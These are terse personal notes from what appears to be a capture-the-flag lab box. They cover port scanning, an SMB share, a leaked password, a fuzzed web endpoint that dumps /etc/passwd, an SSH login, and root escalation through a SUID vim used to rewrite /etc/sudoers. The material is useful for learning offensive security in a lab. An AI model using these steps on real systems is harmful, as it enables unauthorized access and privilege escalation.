export IP= 


Discovered open port 80/tcp on 10.10.145.215
Discovered open port 8080/tcp on 10.10.145.215
Discovered open port 139/tcp on 10.10.145.215
Discovered open port 22/tcp on 10.10.145.215
Discovered open port 5000/tcp on 10.10.145.215
Discovered open port 445/tcp on 10.10.145.215
Discovered open port 9999/tcp on 10.10.145.215
Discovered open port 6555/tcp on 10.10.145.215



*public smb
smbclient \\\\tyler.thm\\public


2308b0cccea3f2a187a89a9f3155a3a4


Let's keep things interesting... X8JEETQmf3hkS65f






http://10.10.145.215/betatest/



checkuser.php

 



*fuzzing

tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash
tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash

mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin

narrator:x:1002:1002::/home/narrator:/bin/bash
narrator:x:1002:1002::/home/narrator:/bin/bash

root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin




*confirm w/ check user


narrator:x:1002:1002::/home/narrator:/bin/bash narrator:x:1002:1002::/home/narrator:/bin/bash

tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash


root:x:0:0:root:/root:/bin/bash operator:x:11:0:operator:/root:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin




ssh narrator:X8JEETQmf3hkS65f

/home/narrator/user.txt


-rwsr-sr-x. 1 root root     2.3M Aug  8  2019 /usr/bin/vim

vim /etc/sudoers

narrator ALL=(ALL)       ALL

(Esc key)

wq!

(enter)


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
narrator:x:1002:1002::/home/narrator:/bin/bash
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
nginx:x:997:994:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
librenms:x:996:993::/opt/librenms:/bin/bash




